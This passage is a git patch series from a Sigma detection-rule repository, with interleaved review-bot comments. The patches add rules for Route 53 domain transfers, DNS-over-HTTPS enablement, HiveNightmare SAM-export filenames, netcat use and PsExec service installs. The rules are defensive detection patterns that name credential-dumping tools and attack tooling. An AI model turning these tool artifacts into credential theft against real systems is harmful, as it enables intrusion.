a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml 
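Review bot: The rule uses `reference:` where the other rules on this page (and the `test_references` check in tests/test_rules.py) use `references:`, so the link list will be ignored by tooling; rename the key to `references:`. The file also has no `id:` UUID, which every other rule here carries and which PATCH 0061 later adds to the sibling lock_disabled rule but not to this one. Both issues recur unchanged in the identical re-creation of this file in PATCH 0052 and in the `reference:` block of PATCH 0053's aws_route_53_domain_transferred_lock_disabled.yml. Tagging `attack.credential_access` next to `attack.t1098` is questionable, since T1098 belongs to persistence/privilege escalation and a registrar transfer yields no credentials — consider dropping that tag.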
@@ -1,5 +1,5 @@ -title: "AWS Route 53 Domain Transferred to Another Account" -description: "Identifies when a request has been made to transfer a Route 53 domain to another AWS account." +title: AWS Route 53 Domain Transferred to Another Account +description: Identifies when a request has been made to transfer a Route 53 domain to another AWS account. author: Elastic, Austin Songer status: experimental date: 2021/07/22 @@ -15,8 +15,8 @@ detection: condition: all of them tags: - attack.persistence - - attack.credential_access - - attack.t1098 + - attack.credential_access + - attack.t1098 falsepositives: - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low From 831a4909d2633c4f28239bf122cc3439a29cab96 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:40:28 -0500 Subject: [PATCH 0050/1367] Update aws_route_53_domain_transferred_to_another_account.yml --- .../aws_route_53_domain_transferred_to_another_account.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml index 9dd6a0f3..3ca1501f 100644 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -1,5 +1,5 @@ title: AWS Route 53 Domain Transferred to Another Account -description: Identifies when a request has been made to transfer a Route 53 domain to another AWS account. +description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. author: Elastic, Austin Songer status: experimental date: 2021/07/22 
From 41f41b4c7bc5d2ac354d9cc824a043f6344d342c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:41:08 -0500 Subject: [PATCH 0051/1367] Delete aws_route_53_domain_transferred_to_another_account.yml --- ..._domain_transferred_to_another_account.yml | 22 ------------------- 1 file changed, 22 deletions(-) delete mode 100644 rules/cloud/aws_route_53_domain_transferred_to_another_account.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml deleted file mode 100644 index 3ca1501f..00000000 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ /dev/null @@ -1,22 +0,0 @@ -title: AWS Route 53 Domain Transferred to Another Account -description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. -author: Elastic, Austin Songer -status: experimental -date: 2021/07/22 -reference: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml -logsource: - service: cloudtrail -detection: - selection_source: - - eventSource: route53.amazonaws.com - selection_eventname: - - eventName: TransferDomainToAnotherAwsAccount - condition: all of them -tags: - - attack.persistence - - attack.credential_access - - attack.t1098 -falsepositives: -- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. -level: low From 1ec329f5628018565edb10e23680411337d7adcb Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Thu, 22 Jul 2021 21:41:59 -0500 Subject: [PATCH 0052/1367] Create aws_route_53_domain_transferred_to_another_account.yml --- ..._domain_transferred_to_another_account.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/aws_route_53_domain_transferred_to_another_account.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml new file mode 100644 index 00000000..3ca1501f --- /dev/null +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -0,0 +1,22 @@ +title: AWS Route 53 Domain Transferred to Another Account +description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. +author: Elastic, Austin Songer +status: experimental +date: 2021/07/22 +reference: + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: route53.amazonaws.com + selection_eventname: + - eventName: TransferDomainToAnotherAwsAccount + condition: all of them +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 +falsepositives: +- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low From 82419ff8ddc4eb3417944215a17b03db70a3e419 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Thu, 22 Jul 2021 21:46:13 -0500 Subject: [PATCH 0053/1367] Create aws_route_53_domain_transferred_lock_disabled.yml --- ...te_53_domain_transferred_lock_disabled.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml new file mode 100644 index 00000000..2b608421 --- /dev/null +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -0,0 +1,24 @@ +title: AWS Route 53 Domain Transfer Lock Disabled +description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. +author: Elastic, Austin Songer +status: experimental +date: 2021/07/22 +reference: + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: route53.amazonaws.com + selection_eventname: + - eventName: DisableDomainTransferLock + condition: all of them +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 +falsepositives: +- A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + From cdfe0e76622e9cf02033807d1020e870f4bd57eb Mon Sep 17 00:00:00 2001 
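Review bot: The new file ends after `falsepositives:` with no `level:` field, which every other rule on this page carries and which the `test_level` check added in PATCH 0046 reports as a failure; add `level: low` (the sibling transfer rule uses `low`) or whichever severity is intended. The `reference:` key should be `references:` as in the other rules here. `attack.credential_access` alongside `attack.t1098` is also a mismatch, as that technique sits under persistence/privilege escalation.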
From: Austin Songer Date: Thu, 22 Jul 2021 21:48:23 -0500 Subject: [PATCH 0054/1367] Delete sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 34 ------------------- 1 file changed, 34 deletions(-) delete mode 100644 rules/windows/registry_event/sysmon_dns_over_https_enabled.yml diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml deleted file mode 100644 index e3ba5eb6..00000000 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ /dev/null @@ -1,34 +0,0 @@ -title: DNS-over-HTTPS Enabled by Registry -id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 -date: 2021/07/22 -description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. -author: Austin Songer -status: experimental -references: - - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - - https://github.com/elastic/detection-rules/issues/1371 - - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode -tags: - - attack.defense_evasion - - attack.t1140 - - attack.t1112 -logsource: - product: windows - category: registry_event -detection: - selection1: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' - Details: 'DWORD (1)' - selection2: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' - Details: 'DWORD (secure)' - selection3: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' - Details: 'DWORD (1)' - condition: selection1 or selection2 or selection3 -falsepositives: -- Unlikely -level: medium From a4b78ef4f064b93b816b4aabad9ea87d10a343f5 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Thu, 22 Jul 2021 21:48:28 -0500 Subject: [PATCH 0055/1367] Delete sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 34 ------------------- 1 file changed, 34 deletions(-) delete mode 100644 rules/windows/registry_event/sysmon_dns_over_https_enabled.yml diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml deleted file mode 100644 index e3ba5eb6..00000000 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ /dev/null @@ -1,34 +0,0 @@ -title: DNS-over-HTTPS Enabled by Registry -id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 -date: 2021/07/22 -description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. -author: Austin Songer -status: experimental -references: - - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - - https://github.com/elastic/detection-rules/issues/1371 - - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode -tags: - - attack.defense_evasion - - attack.t1140 - - attack.t1112 -logsource: - product: windows - category: registry_event -detection: - selection1: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' - Details: 'DWORD (1)' - selection2: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' - Details: 'DWORD (secure)' - selection3: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' - Details: 'DWORD (1)' - condition: selection1 or selection2 or selection3 -falsepositives: -- Unlikely -level: medium From d9dc442f4ecef78810907506be68b2fc120624cc Mon Sep 17 00:00:00 2001 
From: Florian Roth Date: Fri, 23 Jul 2021 09:41:00 +0200 Subject: [PATCH 0056/1367] rule: HiveNightmare --- .../win_hivenightmare_file_exports.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/file_event/win_hivenightmare_file_exports.yml diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml new file mode 100644 index 00000000..4a6abf48 --- /dev/null +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -0,0 +1,29 @@ +title: Typical HiveNightmare SAM File Export +id: 6ea858a8-ba71-4a12-b2cc-5d83312404c7 +status: experimental +description: Detects files written by the different tools that exploit HiveNightmare +author: Florian Roth +date: 2020/07/23 +references: + - https://github.com/GossiTheDog/HiveNightmare + - https://github.com/FireFart/hivenightmare/ +logsource: + product: windows + category: file_event +tags: + - cve.2021-36934 + - attack.credential_access + - attack.t1552.001 +detection: + selection: + TargetFilename|contains: + - '\hive_sam_' # Go version + - '\SAM-2021-' # C++ version + - '\Sam.save' # PowerShell version + condition: selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Files that accidentally contain these strings +level: high From 5955efa750600d9774f4ca5b19a0994d1b85b9e6 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 23 Jul 2021 09:45:50 +0200 Subject: [PATCH 0057/1367] adjusted timestamp --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 4a6abf48..869295a3 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml 
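Review bot: `date: 2020/07/23` is a year off — the commit is dated 23 Jul 2021 and the rule tags `cve.2021-36934`, a 2021 issue — so it should read `date: 2021/07/23`. The follow-up PATCH 0057, whose subject is "adjusted timestamp", adds the `'\SAM-2022-'` pattern instead and leaves the date untouched. `fields:` lists `CommandLine` and `ParentCommandLine`, which are process-creation attributes absent from `category: file_event` records; `Image` and `TargetFilename` are the fields an analyst would pivot on here. Since the `'\SAM-2021-'` pattern encodes the year, a comment such as `# tool embeds the current year in the file name; extend yearly` would explain why per-year entries keep appearing.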
@@ -19,6 +19,7 @@ detection: TargetFilename|contains: - '\hive_sam_' # Go version - '\SAM-2021-' # C++ version + - '\SAM-2022-' # C++ version - '\Sam.save' # PowerShell version condition: selection fields: From d00ca03cb67842eb19fdb5176695acad4ab1f343 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 23 Jul 2021 09:51:00 +0200 Subject: [PATCH 0058/1367] increased level to high --- rules/windows/process_creation/sysmon_netcat_execution.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_netcat_execution.yml b/rules/windows/process_creation/sysmon_netcat_execution.yml index 21344091..1d114563 100644 --- a/rules/windows/process_creation/sysmon_netcat_execution.yml +++ b/rules/windows/process_creation/sysmon_netcat_execution.yml @@ -28,4 +28,4 @@ detection: condition: selection or selection_cmdline falsepositives: - Legitimate ncat use -level: medium +level: high From 77b4a3791696d194d8e8919a739f53d2ca151a4d Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Fri, 23 Jul 2021 14:58:51 +0700 Subject: [PATCH 0059/1367] Update the references --- rules/windows/process_creation/sysmon_apt_sourgrum.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml index 661a20dd..8ea9ea53 100644 --- a/rules/windows/process_creation/sysmon_apt_sourgrum.yml +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml 
@@ -7,7 +7,7 @@ author: status: experimental level: high references: - - sha256=c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d + - https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SOURGUM_IOC.yaml - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ date: 2021/06/15 From c0138d5ced517d8bd9beb4b79d99df8d8744ead8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 23 Jul 2021 10:39:41 +0200 Subject: [PATCH 0060/1367] add additional filename pattern to HiveNightmare rule --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 869295a3..46461579 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -7,6 +7,7 @@ date: 2020/07/23 references: - https://github.com/GossiTheDog/HiveNightmare - https://github.com/FireFart/hivenightmare/ + - https://github.com/WiredPulse/Invoke-HiveNightmare logsource: product: windows category: file_event @@ -20,6 +21,7 @@ detection: - '\hive_sam_' # Go version - '\SAM-2021-' # C++ version - '\SAM-2022-' # C++ version + - '\SAM-haxx' # Early C++ versions - '\Sam.save' # PowerShell version condition: selection fields: From 844c08f26af375123e752cc34be9178dab2b7358 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 07:56:18 -0500 Subject: [PATCH 0061/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 2b608421..3bf68c0e 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -1,4 +1,5 @@ title: AWS Route 53 Domain Transfer Lock Disabled +id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. author: Elastic, Austin Songer status: experimental From de6d48289c33b1ea568d6efeb6a097e87ae9330c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 07:56:56 -0500 Subject: [PATCH 0062/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 3bf68c0e..f83864a5 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -5,7 +5,7 @@ author: Elastic, Austin Songer status: experimental date: 2021/07/22 reference: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html logsource: From 943d78f363171b8aa0fa010dd47deb3b2ebca5b7 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Fri, 23 Jul 2021 07:57:37 -0500 Subject: [PATCH 0063/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- .../cloud/aws_route_53_domain_transferred_lock_disabled.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index f83864a5..971bb491 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -5,9 +5,9 @@ author: Elastic, Austin Songer status: experimental date: 2021/07/22 reference: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html logsource: service: cloudtrail detection: From 9d007027970c2e595427256c7876757dc501eee7 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 07:57:55 -0500 Subject: [PATCH 0064/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 971bb491..648cad3b 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml 
+++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -4,7 +4,7 @@ description: Detects when a transfer lock was removed from a Route 53 domain. It author: Elastic, Austin Songer status: experimental date: 2021/07/22 -reference: +references: - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html From ada79fe05f57d28b3aa42789f7cd4ea0c7f1ce89 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 08:36:39 -0500 Subject: [PATCH 0065/1367] Update aws_route_53_domain_transferred_to_another_account.yml --- .../aws_route_53_domain_transferred_to_another_account.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml index 3ca1501f..a37bd58a 100644 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -1,9 +1,10 @@ title: AWS Route 53 Domain Transferred to Another Account +id: b056de1a-6e6e-4e40-a67e-97c9808cf41b description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. author: Elastic, Austin Songer status: experimental date: 2021/07/22 -reference: +references: - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml logsource: service: cloudtrail From 880a87ce9129f8caef1fc1698d276a3a79f62a25 Mon Sep 17 00:00:00 2001 
From: Florian Roth Date: Fri, 23 Jul 2021 18:33:38 +0200 Subject: [PATCH 0066/1367] fix: avoid false positives with MSF psexec rule --- ...n_metasploit_or_impacket_smb_psexec_service_install.yml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml b/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml index 833a1349..888c3dc9 100644 --- a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml @@ -3,6 +3,7 @@ id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation author: Bartlomiej Czyz, Relativity date: 2021/01/21 +modified: 2021/07/23 action: global references: - https://bczyz1.github.io/2021/01/30/psexec.html @@ -14,8 +15,10 @@ tags: - attack.t1569.002 detection: selection_1: - ServiceFileName|re: '^.*\\[a-zA-Z]{8}\.exe$' + ServiceFileName|re: '^%systemroot%\\[a-zA-Z]{8}\.exe$' ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' + ServiceStartType: '3' # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697 + ServiceType: '0x10' filter: ServiceName: 'PSEXESVC' condition: selection and selection_1 and not filter @@ -26,7 +29,7 @@ fields: - ServiceName - ServiceFileName falsepositives: - - Highly unlikely + - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name level: high --- logsource: From ed049929055dd32dfbdf3246a2d38f290de67a81 Mon Sep 17 00:00:00 2001 
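Review bot: The tightened `ServiceFileName|re` anchor matches the literal lower-case `%systemroot%`, but the `re` modifier is case-sensitive on most backends, so if the service path is logged in upper case (`%SYSTEMROOT%\...`) the rule now misses the very events it targets while the old `^.*\\` form caught them; a case-insensitive prefix, e.g. `ServiceFileName|re: '(?i)^%systemroot%\\[a-zA-Z]{8}\.exe$'` where the backend's regex engine accepts it, or a per-letter character class, keeps the false-positive reduction without the gap. Because this hunk sits in the `action: global` section, the change applies to every logsource block that follows. `ServiceStartType: '3'` carries an explanatory comment but `ServiceType: '0x10'` does not; `# 0x10 = SERVICE_WIN32_OWN_PROCESS` would make the pair consistent.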
From: Austin Songer Date: Fri, 23 Jul 2021 13:40:50 -0500 Subject: [PATCH 0067/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 648cad3b..5f7ab706 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -16,6 +16,7 @@ detection: selection_eventname: - eventName: DisableDomainTransferLock condition: all of them +level: low tags: - attack.persistence - attack.credential_access From ffcd3a2112bac615b2296ff3d893f59d6adc2099 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 24 Jul 2021 09:41:04 +0200 Subject: [PATCH 0068/1367] Add test_optional_related test_optional_fields test_optional_falsepositives --- .../builtin/win_susp_eventlog_cleared.yml | 4 +- ...ingserver_execute_arbitrary_powershell.yml | 4 +- tests/test_rules.py | 73 ++++++++++++++++++- 3 files changed, 74 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 67693faa..e1e90819 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -2,8 +2,8 @@ action: global title: Eventlog Cleared id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 related: - id: f2f01843-e7b8-4f95-a35a-d23584476423 - type: obsoletes + - id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 
diff --git a/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml b/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml index 0db7846b..5c67cda5 100644 --- a/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml +++ b/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml @@ -1,8 +1,8 @@ title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code id: fbd7c32d-db2a-4418-b92c-566eb8911133 related: - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: obsoletes + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: obsoletes status: experimental author: frack113 date: 2021/07/12 diff --git a/tests/test_rules.py b/tests/test_rules.py index 1e1cec92..cc8a9dab 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -252,6 +252,37 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'id' fields. Create an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).") + def test_optional_related(self): + faulty_rules = [] + valid_type = [ + "derived", + "obsoletes", + "merged", + "renamed", + ] + for file in self.yield_next_rule_file_path(self.path_to_rules): + related_lst = self.get_rule_part(file_path=file, part_name="related") + if related_lst: + # it exists but isn't a list + if not isinstance(related_lst, list): + print(Fore.YELLOW + "Rule {} has a 'related' field that isn't a list.".format(file)) + faulty_rules.append(file) + else: + # should probably test if we have only 'id' and 'type' ... + type_ok = True + for ref in related_lst: + id_str = ref['id'] + type_str = ref['type'] + if not type_str in valid_type: + type_ok = False + #Only add one time if many bad type in the same file + if type_ok == False: + print(Fore.YELLOW + "Rule {} has a 'related/type' invalid value.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + def test_sysmon_rule_without_eventid(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): @@ -287,7 +318,7 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019/01/14)") - def test_date_modified(self): + def test_optional_date_modified(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): modifiedfield = self.get_rule_part(file_path=file, part_name="modified") 
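Review bot: In `test_optional_related`, `ref['id']` and `ref['type']` index each `related` entry directly, so a rule whose entry lacks one of the keys (or is not a mapping at all) aborts the whole test with a `KeyError` instead of being reported as faulty; `id_str` is also assigned and never used. Replacing the two lookups with `if not isinstance(ref, dict) or 'id' not in ref or ref.get('type') not in valid_type:` followed by `type_ok = False` reports such rules the same way as a bad type. Minor style points in the same block: `not type_str in valid_type` reads better as `type_str not in valid_type`, and `if type_ok == False:` as `if not type_ok:`. The second hunk only renames `test_date_modified`, which needs no change.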
